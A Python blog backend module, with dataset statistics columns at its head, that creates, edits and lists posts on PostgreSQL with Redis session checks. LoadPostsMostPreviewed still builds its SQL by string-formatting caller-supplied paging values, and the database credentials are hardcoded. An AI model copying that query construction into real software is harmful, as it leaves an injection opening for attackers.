| 23.724114
| 59
| 0.655161
| 22,087
| 208,274
| 5.781591
| 0.035903
| 0.045999
| 0.029601
| 0.182681
| 0.915089
| 0.914744
| 0.913859
| 0.791524
| 0.790936
| 0.644113
| 0
| 0.130707
| 0.287621
| 208,274
| 8,778
| 60
| 23.726817
| 0.729966
| 0.027425
| 0
| 0.754914
| 1
| 0
| 0.021393
| 0
| 0
| 0
| 0.014077
| 0
| 0
| 1
| 0
| false
| 0
| 0.000468
| 0
| 0.664587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
2a2155ef7508c71c7a3c1d299eb2cb41cd26a9fc
| 29,042
|
py
|
Python
|
blogging.py
|
theoriginalgangster/SimpleAuth
|
b4cf1ce94c18d43ba3fe396f974eeef8d2a6dbd3
|
[
"MIT"
] | null | null | null |
blogging.py
|
theoriginalgangster/SimpleAuth
|
b4cf1ce94c18d43ba3fe396f974eeef8d2a6dbd3
|
[
"MIT"
] | null | null | null |
blogging.py
|
theoriginalgangster/SimpleAuth
|
b4cf1ce94c18d43ba3fe396f974eeef8d2a6dbd3
|
[
"MIT"
] | null | null | null |
import datetime
import json
import random
import secrets
import string

import bcrypt
import psycopg2 as pg
import redis
# --- PostgreSQL connection settings -----------------------------------------
DBHOST = "localhost"
DBPORT = "5432"
DBNAME = "simple_auth"
DBUSER = "simple_auth"
DBPASS = "simple_auth"
# --- Redis connection settings ----------------------------------------------
REDISHOST = "localhost"
REDISPORT = 6379
# Redis key timeout.
# Timeout for session to remove itself after
# inactivity.
# @TODO Note: Make sure to expire every time
# you set something or else this won't work.
# need to put this in a function.
SESSION_EXPIRE_MINUTES = 30
# Redis key name for admin data — presumably; nothing in this module reads it.
ADMIN_KEY = "ADMIN_KEY"
# Generic fallback error message used by get_default_response().
UE = "Unknown Error"
def get_redis_conn():
    """Return a StrictRedis client bound to the configured host/port, db 0."""
    return redis.StrictRedis(host=REDISHOST, port=REDISPORT, db=0)
def get_pg_conn_curser():
    """Open a PostgreSQL connection plus cursor.

    Returns (connection, cursor); the caller is responsible for
    committing and closing the connection.
    """
    connection = pg.connect(
        host=DBHOST,
        port=DBPORT,
        dbname=DBNAME,
        user=DBUSER,
        password=DBPASS,
    )
    return connection, connection.cursor()
def log_auth_exception(exception):
    """Report *exception* by printing it to stdout.

    NOTE(review): consider switching to the logging module.
    """
    print(exception)
def get_default_response():
    """Build the baseline API response: failed, carrying the generic error."""
    return {
        'success': False,
        'error_code': "UE",
        'error': UE,
    }
def set_response_failed(response):
    """Collapse *response* to a failure payload.

    Only 'error' and 'error_code' are carried over; 'success' is forced
    to False and every other key is dropped.
    """
    return {
        'error': response['error'],
        'error_code': response['error_code'],
        'success': False,
    }
def set_response_success(response):
    """Mark *response* successful in place and return it.

    Removes the 'error' and 'error_code' keys (if present) and sets
    'success' to True.

    Fixes: the original indexed response['error'] before testing it, so a
    response that never had the key raised KeyError; it also kept the key
    when its value was None. pop() with a default handles both cases.
    """
    response.pop('error', None)
    response.pop('error_code', None)
    response['success'] = True
    return response
def generate_cookie():
    """Return a 29-character random lowercase session token.

    Fixes: ``string.lowercase`` is Python 2 only (renamed
    ``string.ascii_lowercase`` in Python 3, so the original raised
    AttributeError there). Session tokens are security-sensitive, so the
    characters are drawn with ``secrets.choice`` instead of the
    non-cryptographic ``random.choice``.
    """
    return ''.join(secrets.choice(string.ascii_lowercase) for _ in range(29))
"""----------------------------------------------------------------------------
Create New Post (Postgres)
----------------------------------------------------------------------------"""
# Error strings returned by CreateNewPost; the matching error_code is the
# constant's name ("CNP_1", ...).
CNP_1 = "Unrecognized app_token."
CNP_2 = "Post with that title already exists."
CNP_3 = "Unknown author. Author must have an admin account."
def CreateNewPost(app_token, title, author, publication_timestamp, main_image_url, content, tags, category, hidden):
    """Create a blog post in blog_posts and associate its tags.

    Parameters:
        app_token: Redis session key; the caller must hold a live session.
        title: post title — must be unique (CNP_2 is returned on a
            duplicate, per the "already exists" error handling below).
        author: author identifier; must satisfy a foreign key on
            blog_posts (CNP_3 on "not present"). Presumably an admin
            account e-mail — confirm against the accounts table.
        publication_timestamp: string parsed with the Postgres format
            'dd-mm-yyyy hh24:mi:ss'.
        main_image_url, content, category: stored verbatim.
        tags: iterable of tag strings, one blog_post_tags row each.
        hidden: boolean visibility flag.

    Returns a response dict: {'success': True} on success, otherwise
    {'success': False, 'error': ..., 'error_code': 'CNP_1'..'CNP_3'}.
    """
    response = get_default_response()
    try:
        # First authenticate the user and make sure their cookie exists.
        redis_conn = get_redis_conn()
        session = redis_conn.get(app_token)
        if session is None:
            # Unknown app_token — the user is not authenticated.
            response['error_code'] = "CNP_1"
            response['error'] = CNP_1
            response = set_response_failed(response)
            return response
        # Session payload is JSON; decoded but currently unused beyond
        # proving the token is valid.
        session = json.loads(session)
        pg_conn, pg_curs = get_pg_conn_curser()
        # Insert the post.
        pg_curs.execute("""
            PREPARE CreateNewPost_sub1(text, text, text, text, text, text, boolean) AS
            INSERT INTO
                blog_posts
            (
                title,
                author,
                publication_timestamp,
                main_image_url,
                content,
                category,
                hidden
            ) VALUES ($1, $2, to_timestamp($3, 'dd-mm-yyyy hh24:mi:ss'), $4, $5, $6, $7);
            EXECUTE CreateNewPost_sub1(%s, %s, %s, %s, %s, %s, %s);
            """,
            (
                title,
                author,
                publication_timestamp,
                main_image_url,
                content,
                category,
                hidden,
            )
        )
        pg_conn.commit()
        pg_conn.close()
        # Associate all the tags.
        # @TODO Figure out what the hell is going on with prepared
        # statements already existing so I don't have to open a new
        # db connection to associate tags.
        # (PREPARE names are per-connection, so re-running the same
        # PREPARE on one connection errors — hence the reconnect per tag.)
        for tag in tags:
            pg_conn, pg_curs = get_pg_conn_curser()
            pg_curs.execute("""
                PREPARE CreateNewPost_sub1(text, text) AS
                INSERT INTO
                    blog_post_tags
                (
                    post_title,
                    tag
                ) VALUES ($1, $2);
                EXECUTE CreateNewPost_sub1(%s, %s);
                """,
                (
                    title,
                    tag,
                )
            )
            pg_conn.commit()
            pg_conn.close()
        # Return response.
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Close the db connection (may not exist yet if redis failed).
        try:
            pg_conn.close()
        except:
            pass
        # Map known constraint failures onto specific error codes by
        # sniffing the exception text.
        if ("title" in str(ex)) and ("already exists" in str(ex)):
            response['error_code'] = "CNP_2"
            response['error'] = CNP_2
            response = set_response_failed(response)
            return response
        if ("author" in str(ex)) and ("not present" in str(ex)):
            response['error_code'] = "CNP_3"
            response['error'] = CNP_3
            response = set_response_failed(response)
            return response
        # Return default failure response.
        response = set_response_failed(response)
        return response
# print(CreateNewPost("ecqvepmfpwmzzmrqmcbcsvtwqwdrk", "example_title", "example_user@gmail.com", "2017-04-05 21:46:05.243873", "example_main_image_url", "example_content", ["example_tag_1", "exapmle_tag_2"], "example_category", False))
"""----------------------------------------------------------------------------
Edit Post (Postgres)
----------------------------------------------------------------------------"""
# Error strings returned by EditPost; the matching error_code is the
# constant's name ("EP_1", ...).
EP_1 = "Unrecognized app_token."
EP_2 = "Post with that title already exists."
EP_3 = "Unknown author. Author must have an admin account."
def EditPost(app_token, post_id, title, author, publication_timestamp, main_image_url, content, tags, category, hidden):
    """Update the blog_posts row identified by *post_id* and replace its tags.

    Parameters mirror CreateNewPost, plus:
        post_id: integer primary key of the row to update.
        tags: the FULL new tag set — existing tag rows for the post are
            deleted first, then re-inserted from this iterable.

    Returns a response dict: {'success': True} on success, otherwise
    {'success': False, 'error': ..., 'error_code': 'EP_1'..'EP_3'}.

    NOTE(review): the PREPARE statement names ("CreateNewPost_sub1/2")
    were copied from CreateNewPost — harmless because each runs on a
    fresh connection, but misleading.
    """
    response = get_default_response()
    try:
        # First authenticate the user and make sure their cookie exists.
        redis_conn = get_redis_conn()
        session = redis_conn.get(app_token)
        if session is None:
            # Unknown app_token — the user is not authenticated.
            response['error_code'] = "EP_1"
            response['error'] = EP_1
            response = set_response_failed(response)
            return response
        # Decoded but otherwise unused; proves the token is valid.
        session = json.loads(session)
        pg_conn, pg_curs = get_pg_conn_curser()
        # Update the post row.
        pg_curs.execute("""
            PREPARE CreateNewPost_sub1(text, text, text, text, text, text, boolean, integer) AS
            UPDATE
                blog_posts
            SET
                title = $1,
                author = $2,
                publication_timestamp = to_timestamp($3, 'dd-mm-yyyy hh24:mi:ss'),
                main_image_url = $4,
                content = $5,
                category = $6,
                hidden = $7
            WHERE
                id = $8;
            EXECUTE CreateNewPost_sub1(%s, %s, %s, %s, %s, %s, %s, %s);
            """,
            (
                title,
                author,
                publication_timestamp,
                main_image_url,
                content,
                category,
                hidden,
                post_id,
            )
        )
        pg_conn.commit()
        pg_conn.close()
        # Delete all the tags associated with the post so you
        # can update them with the one's in this update command.
        pg_conn, pg_curs = get_pg_conn_curser()
        pg_curs.execute("""
            PREPARE CreateNewPost_sub2(text) AS
            DELETE FROM
                blog_post_tags
            WHERE
                post_title = $1;
            EXECUTE CreateNewPost_sub2(%s);
            """,
            (
                title,
            )
        )
        pg_conn.commit()
        pg_conn.close()
        # Associate all the tags.
        # @TODO Figure out what the hell is going on with prepared
        # statements already existing so I don't have to open a new
        # db connection to associate tags.
        # (PREPARE names are per-connection — hence the reconnect per tag.)
        for tag in tags:
            pg_conn, pg_curs = get_pg_conn_curser()
            pg_curs.execute("""
                PREPARE CreateNewPost_sub1(text, text) AS
                INSERT INTO
                    blog_post_tags
                (
                    post_title,
                    tag
                ) VALUES ($1, $2);
                EXECUTE CreateNewPost_sub1(%s, %s);
                """,
                (
                    title,
                    tag,
                )
            )
            pg_conn.commit()
            pg_conn.close()
        # Return response.
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Close the db connection (may not exist yet if redis failed).
        try:
            pg_conn.close()
        except:
            pass
        # Map known constraint failures onto specific error codes by
        # sniffing the exception text.
        if ("title" in str(ex)) and ("already exists" in str(ex)):
            response['error_code'] = "EP_2"
            response['error'] = EP_2
            response = set_response_failed(response)
            return response
        if ("author" in str(ex)) and ("not present" in str(ex)):
            response['error_code'] = "EP_3"
            response['error'] = EP_3
            response = set_response_failed(response)
            return response
        response = set_response_failed(response)
        return response
# print(EditPost("ecqvepmfpwmzzmrqmcbcsvtwqwdrk", 26, "Nexample_title", "example_user@gmail.com", "2017-04-05 21:46:05.243873", "Nexample_main_image_url", "Nexample_content", ["Nexample_tag_1", "Nexapmle_tag_2"], "Nexample_category", False))
"""----------------------------------------------------------------------------
Load Full Post (Postgres)
----------------------------------------------------------------------------"""
LFP_1 = "Unknown title."  # LoadFullPost error: no post with the given title.
def LoadFullPost(title):
    """Fetch one post by exact *title* and increment its view counter.

    No authentication — this is the public read path.

    Returns a response dict with the full blog_posts row flattened into
    top-level keys ('id', 'title', ..., 'comment_count') and
    'success': True, or a failure dict with error_code 'LFP_1' when the
    title is unknown.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # Fetch the post row by title.
        pg_curs.execute("""
            PREPARE LoadFullPost_sub1(text) AS
            SELECT
                id,
                title,
                author,
                publication_timestamp,
                creation_timestamp,
                main_image_url,
                content,
                category,
                hidden,
                view_count,
                preview_count,
                comment_count
            FROM
                blog_posts
            WHERE
                title = $1;
            EXECUTE LoadFullPost_sub1(%s);
            """,
            (
                title,
            )
        )
        result = pg_curs.fetchone()
        if result is None:
            # Unknown title.
            response['error_code'] = "LFP_1"
            response['error'] = LFP_1
            response = set_response_failed(response)
            return response
        # Update and increment the post view.
        pg_curs.execute("""
            PREPARE LoadFullPost_sub2(text) AS
            UPDATE
                blog_posts
            SET
                view_count = view_count + 1
            WHERE
                title = $1;
            EXECUTE LoadFullPost_sub2(%s);
            """,
            (
                title,
            )
        )
        pg_conn.commit()
        # Close the db connection.
        pg_conn.close()
        # Flatten the row into the response; timestamps are stringified
        # so the dict stays JSON-serializable.
        response['id'] = result[0]
        response['title'] = result[1]
        response['author'] = result[2]
        response['publication_timestamp'] = str(result[3])
        response['creation_timestamp'] = str(result[4])
        response['main_image_url'] = result[5]
        response['content'] = result[6]
        response['category'] = result[7]
        response['hidden'] = result[8]
        response['view_count'] = result[9]
        response['preview_count'] = result[10]
        response['comment_count'] = result[11]
        # Return the response.
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Close the db connection (may not exist if connect failed).
        try:
            pg_conn.close()
        except:
            pass
        # Return default failure response.
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadFullPost("Nexample_title"))
"""----------------------------------------------------------------------------
Load Post Analytics (Postgres, Redis)
----------------------------------------------------------------------------"""
def LoadPostAnalytics(cookie, title):
    """Stub — per-post analytics are not implemented yet; prints a placeholder."""
    print("test")
"""----------------------------------------------------------------------------
Load Blog Analytics (Postgres, Redis)
----------------------------------------------------------------------------"""
def LoadBlogAnalytics(cookie):
    """Stub — blog-wide analytics are not implemented yet; prints a placeholder."""
    print("test")
"""----------------------------------------------------------------------------
Load Posts By Category (Postgres)
----------------------------------------------------------------------------"""
# NOTE(review): declared for LoadPostsByCategory but never referenced by it.
LPBC_1 = "Unknown category."
def LoadPostsByCategory(category, max_posts, pagination, only_published = True):
    """Return up to *max_posts* post previews for *category*, newest first.

    Parameters:
        category: category string to filter on.
        max_posts: page size (LIMIT).
        pagination: zero-based page index; OFFSET = max_posts * pagination.
        only_published: when True, restrict to posts whose publication
            date is today or earlier and whose `published` flag is set.
            NOTE(review): no function in this module ever writes a
            `published` column — confirm it exists in the schema.

    Returns {'success': True, 'posts': [...]} where each post dict holds
    the preview columns (content truncated to 59 characters), or a
    generic failure dict on error. Increments preview_count for every
    returned post.

    Fixes vs. original: `category` was interpolated straight into the
    SQL text (SQL injection); it now travels as a bound parameter, as do
    LIMIT/OFFSET. Only the locally-built, constant where-clause fragment
    is spliced into the statement. The dead `fetchall() is None` branch
    was removed (fetchall returns a list); an empty result yields
    {'posts': []} exactly as before.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # Optional publication filter; ends with AND so it composes with
        # the category predicate below. This fragment is trusted local
        # text, never user input.
        if only_published:
            published_where_clause = """
                TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
                AND published = True
                AND"""
        else:
            published_where_clause = ""
        # Calculate offset from max_posts and pagination.
        offset = max_posts * pagination
        # %%s survives the %-format below as %s, psycopg2's placeholder.
        sql = """
            SELECT
                id, title, author, publication_timestamp, creation_timestamp,
                main_image_url, LEFT(content, 59), category, hidden,
                view_count, preview_count, comment_count
            FROM blog_posts
            WHERE %s
                category = %%s
            ORDER BY publication_timestamp DESC
            LIMIT %%s OFFSET %%s;
            """ % (published_where_clause,)
        pg_curs.execute(sql, (category, max_posts, offset))
        result = pg_curs.fetchall()
        posts = []
        post_ids = []
        for row in result:
            posts.append({
                'id': row[0],
                'title': row[1],
                'author': row[2],
                'publication_timestamp': str(row[3]),
                'creation_timestamp': str(row[4]),
                'main_image_url': row[5],
                'content': row[6],
                'category': row[7],
                'hidden': row[8],
                'view_count': row[9],
                'preview_count': row[10],
                'comment_count': row[11],
            })
            post_ids.append(row[0])
        # Count this listing as a preview for every returned post.
        if post_ids:
            pg_curs.execute(
                """
                UPDATE blog_posts
                SET preview_count = preview_count + 1
                WHERE id = ANY(%s);
                """,
                (post_ids,),
            )
            pg_conn.commit()
        # Close the db connection.
        pg_conn.close()
        response['posts'] = posts
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Close the db connection (may not exist if connect failed).
        try:
            pg_conn.close()
        except:
            pass
        # Return default failure response.
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadPostsByCategory('testthing', 4, 0))
# pp.pprint(LoadPostsByCategory('testthing', 4, 0, False))
"""----------------------------------------------------------------------------
Load Posts By Tag (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsByTag(tag, max_posts, pagination, only_published = True):
    """Return up to *max_posts* post previews carrying *tag*, newest first.

    Parameters:
        tag: tag string matched against blog_post_tags.tag.
        max_posts: page size (LIMIT).
        pagination: zero-based page index; OFFSET = max_posts * pagination.
        only_published: when True, restrict to posts whose publication
            date is today or earlier and whose `published` flag is set.
            NOTE(review): no function in this module writes a `published`
            column — confirm it exists in the schema.

    Returns {'success': True, 'posts': [...]} with preview rows (content
    truncated to 59 characters), or a generic failure dict on error.
    Increments preview_count for every returned post.

    Fixes vs. original: `tag` was interpolated straight into the SQL
    text (SQL injection); it now travels as a bound parameter, as do
    LIMIT/OFFSET. The dead `fetchall() is None` branch was removed.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # Optional publication filter; ends with AND so it composes with
        # the tag predicate below. Trusted local text, never user input.
        if only_published:
            published_where_clause = """
                TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
                AND published = True
                AND"""
        else:
            published_where_clause = ""
        # Calculate offset from max_posts and pagination.
        offset = max_posts * pagination
        # %%s survives the %-format below as %s, psycopg2's placeholder.
        sql = """
            SELECT
                bp.id, bp.title, bp.author, bp.publication_timestamp,
                bp.creation_timestamp, bp.main_image_url, LEFT(bp.content, 59),
                bp.category, bp.hidden, bp.view_count, bp.preview_count,
                bp.comment_count
            FROM blog_posts bp
            LEFT JOIN blog_post_tags t ON bp.title = t.post_title
            WHERE %s
                t.tag = %%s
            ORDER BY publication_timestamp DESC
            LIMIT %%s OFFSET %%s;
            """ % (published_where_clause,)
        pg_curs.execute(sql, (tag, max_posts, offset))
        result = pg_curs.fetchall()
        posts = []
        post_ids = []
        for row in result:
            posts.append({
                'id': row[0],
                'title': row[1],
                'author': row[2],
                'publication_timestamp': str(row[3]),
                'creation_timestamp': str(row[4]),
                'main_image_url': row[5],
                'content': row[6],
                'category': row[7],
                'hidden': row[8],
                'view_count': row[9],
                'preview_count': row[10],
                'comment_count': row[11],
            })
            post_ids.append(row[0])
        # Count this listing as a preview for every returned post.
        if post_ids:
            pg_curs.execute(
                """
                UPDATE blog_posts
                SET preview_count = preview_count + 1
                WHERE id = ANY(%s);
                """,
                (post_ids,),
            )
            pg_conn.commit()
        # Close the db connection.
        pg_conn.close()
        response['posts'] = posts
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Close the db connection (may not exist if connect failed).
        try:
            pg_conn.close()
        except:
            pass
        # Return default failure response.
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadPostsByTag('Nexample_tag_1', 4, 0))
# pp.pprint(LoadPostsByTag('Nexample_tag_1', 4, 0, False))
"""----------------------------------------------------------------------------
Load Posts Most Recent (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsMostRecent(max_posts, pagination, only_published = True):
    """Return up to *max_posts* post previews ordered newest first.

    Parameters:
        max_posts: page size (LIMIT).
        pagination: zero-based page index; OFFSET = max_posts * pagination.
        only_published: when True, restrict to posts whose publication
            date is today or earlier and whose `published` flag is set.
            NOTE(review): no function in this module writes a `published`
            column — confirm it exists in the schema.

    Returns {'success': True, 'posts': [...]} with preview rows (content
    truncated to 59 characters), or a generic failure dict on error.
    Increments preview_count for every returned post.

    Fixes vs. original: LIMIT/OFFSET were interpolated into the SQL text
    with %-formatting; they now travel as bound parameters. Only the
    locally-built, constant where clause is spliced into the statement.
    The dead `fetchall() is None` branch was removed.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # Optional publication filter — a complete WHERE clause here,
        # since there is no other predicate. Trusted local text.
        if only_published:
            published_where_clause = """
            WHERE
                TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
                AND published = True"""
        else:
            published_where_clause = ""
        # Calculate offset from max_posts and pagination.
        offset = max_posts * pagination
        # %%s survives the %-format below as %s, psycopg2's placeholder.
        sql = """
            SELECT
                id, title, author, publication_timestamp, creation_timestamp,
                main_image_url, LEFT(content, 59), category, hidden,
                view_count, preview_count, comment_count
            FROM blog_posts
            %s
            ORDER BY publication_timestamp DESC
            LIMIT %%s OFFSET %%s;
            """ % (published_where_clause,)
        pg_curs.execute(sql, (max_posts, offset))
        result = pg_curs.fetchall()
        posts = []
        post_ids = []
        for row in result:
            posts.append({
                'id': row[0],
                'title': row[1],
                'author': row[2],
                'publication_timestamp': str(row[3]),
                'creation_timestamp': str(row[4]),
                'main_image_url': row[5],
                'content': row[6],
                'category': row[7],
                'hidden': row[8],
                'view_count': row[9],
                'preview_count': row[10],
                'comment_count': row[11],
            })
            post_ids.append(row[0])
        # Count this listing as a preview for every returned post.
        if post_ids:
            pg_curs.execute(
                """
                UPDATE blog_posts
                SET preview_count = preview_count + 1
                WHERE id = ANY(%s);
                """,
                (post_ids,),
            )
            pg_conn.commit()
        # Close the db connection.
        pg_conn.close()
        response['posts'] = posts
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Close the db connection (may not exist if connect failed).
        try:
            pg_conn.close()
        except:
            pass
        # Return default failure response.
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadPostsMostRecent(4, 0))
# pp.pprint(LoadPostsMostRecent(4, 0, False))
"""----------------------------------------------------------------------------
Load Posts Most Viewed (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsMostViewed(max_posts, pagination, only_published = True):
    """Load one page of blog posts ordered by view_count, highest first.

    Also increments preview_count for every post returned (a listing hit
    counts as a preview, not a full view).

    Args:
        max_posts: page size (maximum number of posts returned).
        pagination: zero-based page index; offset = max_posts * pagination.
        only_published: when True, restrict to posts whose publication date
            is today or earlier and whose `published` flag is set.

    Returns:
        The standard response dict with a 'posts' list on success, or the
        default failure response on any error.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # Optional WHERE clause restricting results to already-published
        # posts. It must be spliced into the SQL text manually: passing it
        # as a bind parameter would quote it as a string literal.
        if only_published:
            published_where_clause = """
        WHERE
            TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
        AND
            published = True """
        else:
            published_where_clause = ""
        # Cast to int so the values interpolated into the SQL below cannot
        # carry an injection payload; numeric strings still work.
        max_posts = int(max_posts)
        offset = max_posts * int(pagination)
        sql = """
        PREPARE LoadPostsByCategory_sub1(integer, integer) AS
        SELECT
            id,
            title,
            author,
            publication_timestamp,
            creation_timestamp,
            main_image_url,
            LEFT(content, 59),
            category,
            hidden,
            view_count,
            preview_count,
            comment_count
        FROM
            blog_posts
        %s
        ORDER BY
            view_count
        DESC
        LIMIT $1
        OFFSET $2;
        EXECUTE LoadPostsByCategory_sub1(%s, %s);
        """ % (
            published_where_clause,
            max_posts,
            offset,
        )
        pg_curs.execute(sql)
        result = pg_curs.fetchall()
        # fetchall() returns an empty list (never None) when a SELECT has
        # no rows, so test emptiness rather than `is None`; close the
        # connection before the early return.
        if not result:
            pg_conn.close()
            response['posts'] = []
            response = set_response_success(response)
            return response
        posts = []
        post_ids = []
        for row in result:
            post = {}
            post['id'] = row[0]
            post['title'] = row[1]
            post['author'] = row[2]
            post['publication_timestamp'] = str(row[3])
            post['creation_timestamp'] = str(row[4])
            post['main_image_url'] = row[5]
            post['content'] = row[6]
            post['category'] = row[7]
            post['hidden'] = row[8]
            post['view_count'] = row[9]
            post['preview_count'] = row[10]
            post['comment_count'] = row[11]
            posts.append(post)
            post_ids.append(row[0])
        # Increment the preview counter of every returned post. The ids
        # come straight from the database, so joining them is safe.
        update_previews_sql = """
        UPDATE
            blog_posts
        SET
            preview_count = preview_count + 1
        WHERE
            id in (%s)
        """ % (
            ','.join(str(post_id) for post_id in post_ids),
        )
        pg_curs.execute(update_previews_sql)
        pg_conn.commit()
        pg_conn.close()
        response['posts'] = posts
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Best-effort close; the connection may never have been opened.
        try:
            pg_conn.close()
        except Exception:
            pass
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadPostsMostViewed(4, 0))
# pp.pprint(LoadPostsMostViewed(4, 0, False))
"""----------------------------------------------------------------------------
Load Posts Most Previewed (Postgres)
----------------------------------------------------------------------------"""
def LoadPostsMostPreviewed(max_posts, pagination, only_published = True):
    """Fetch one page of blog posts sorted by preview_count (highest first).

    Every returned post also gets its preview_count bumped by one.
    Returns the standard response dict with a 'posts' list, or the default
    failure response on error.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # Restrict to already-published posts unless the caller opted out.
        if (only_published == True):
            published_where_clause = """
        WHERE
            TO_CHAR(publication_timestamp, 'YYYY-MM-DD') <= TO_CHAR(NOW(), 'YYYY-MM-DD')
        AND
            published = True """
        else:
            published_where_clause = ""
        offset = max_posts * pagination
        # The WHERE clause has to be spliced into the statement text by
        # hand; a bind parameter would be quoted as a string literal.
        sql = """
        PREPARE LoadPostsByCategory_sub1(integer, integer) AS
        SELECT
            id,
            title,
            author,
            publication_timestamp,
            creation_timestamp,
            main_image_url,
            LEFT(content, 59),
            category,
            hidden,
            view_count,
            preview_count,
            comment_count
        FROM
            blog_posts
        %s
        ORDER BY
            preview_count
        DESC
        LIMIT $1
        OFFSET $2;
        EXECUTE LoadPostsByCategory_sub1(%s, %s);
        """ % (
            published_where_clause,
            max_posts,
            offset,
        )
        pg_curs.execute(sql)
        result = pg_curs.fetchall()
        if result is None:
            response['posts'] = []
            response = set_response_success(response)
            return response
        # Map each row onto a dict; the tuple below mirrors the SELECT
        # column order exactly.
        columns = ('id', 'title', 'author', 'publication_timestamp',
                   'creation_timestamp', 'main_image_url', 'content',
                   'category', 'hidden', 'view_count', 'preview_count',
                   'comment_count')
        posts = []
        post_ids = []
        for row in result:
            post = dict(zip(columns, row))
            post['publication_timestamp'] = str(post['publication_timestamp'])
            post['creation_timestamp'] = str(post['creation_timestamp'])
            posts.append(post)
            post_ids.append(post['id'])
        # Bump the preview counter for every post we are about to return.
        if len(result) != 0:
            id_list = ','.join(str(post_id) for post_id in post_ids)
            update_previews_sql = """
        UPDATE
            blog_posts
        SET
            preview_count = preview_count + 1
        WHERE
            id in (%s)
        """ % (
                id_list,
            )
            pg_curs.execute(update_previews_sql)
            pg_conn.commit()
        pg_conn.close()
        response['posts'] = posts
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Best-effort cleanup; the connection may not exist.
        try:
            pg_conn.close()
        except:
            pass
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadPostsMostPreviewed(4, 0))
# pp.pprint(LoadPostsMostPreviewed(4, 0, False))
"""----------------------------------------------------------------------------
Load All Categories (Postgres)
----------------------------------------------------------------------------"""
def LoadAllCategories():
    """Load every blog post category together with its post count.

    Returns:
        The standard response dict with a 'categories' list of
        {'name': <category>, 'count': <posts in it>} entries on success,
        or the default failure response on any error.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # GROUP BY already yields one row per category, so the previous
        # DISTINCT was redundant and has been dropped.
        pg_curs.execute("""
        SELECT
            category,
            COUNT(*)
        FROM
            blog_posts
        GROUP BY 1
        """)
        result = pg_curs.fetchall()
        # fetchall() returns an empty list (never None) for a SELECT with
        # no rows, so check emptiness; close the connection before the
        # early return.
        if not result:
            pg_conn.close()
            response['categories'] = []
            response = set_response_success(response)
            return response
        categories = [{'name': row[0], 'count': row[1]} for row in result]
        pg_conn.close()
        response['categories'] = categories
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Best-effort close; the connection may never have been opened.
        try:
            pg_conn.close()
        except Exception:
            pass
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadAllCategories())
"""----------------------------------------------------------------------------
Load All Tags (Postgres)
----------------------------------------------------------------------------"""
def LoadAllTags():
    """Return every tag used on blog posts along with how many posts carry it.

    Produces the standard response dict with a 'tags' list of
    {'name': ..., 'count': ...} entries, or the default failure response
    on error.
    """
    response = get_default_response()
    try:
        pg_conn, pg_curs = get_pg_conn_curser()
        # One row per tag with its usage count.
        pg_curs.execute("""
        SELECT DISTINCT
            tag,
            COUNT(*)
        FROM
            blog_post_tags
        GROUP BY 1
        """)
        rows = pg_curs.fetchall()
        if rows is None:
            response['tags'] = []
            response = set_response_success(response)
            return response
        response['tags'] = [
            {'name': row[0], 'count': row[1]}
            for row in rows
        ]
        pg_conn.close()
        response = set_response_success(response)
        return response
    except Exception as ex:
        log_auth_exception(ex)
        # Best-effort cleanup of the connection, if it was ever opened.
        try:
            pg_conn.close()
        except:
            pass
        response = set_response_failed(response)
        return response
# import pprint as pp
# pp.pprint(LoadAllTags())
| 26.187556
| 241
| 0.631086
| 3,698
| 29,042
| 4.780422
| 0.086263
| 0.021722
| 0.036543
| 0.030546
| 0.802636
| 0.778934
| 0.761851
| 0.748897
| 0.737583
| 0.730739
| 0
| 0.012147
| 0.200606
| 29,042
| 1,108
| 242
| 26.211191
| 0.749311
| 0.213105
| 0
| 0.765882
| 0
| 0.009412
| 0.330258
| 0.056679
| 0
| 0
| 0
| 0.002708
| 0
| 0
| null | null | 0.014118
| 0.008235
| null | null | 0.003529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
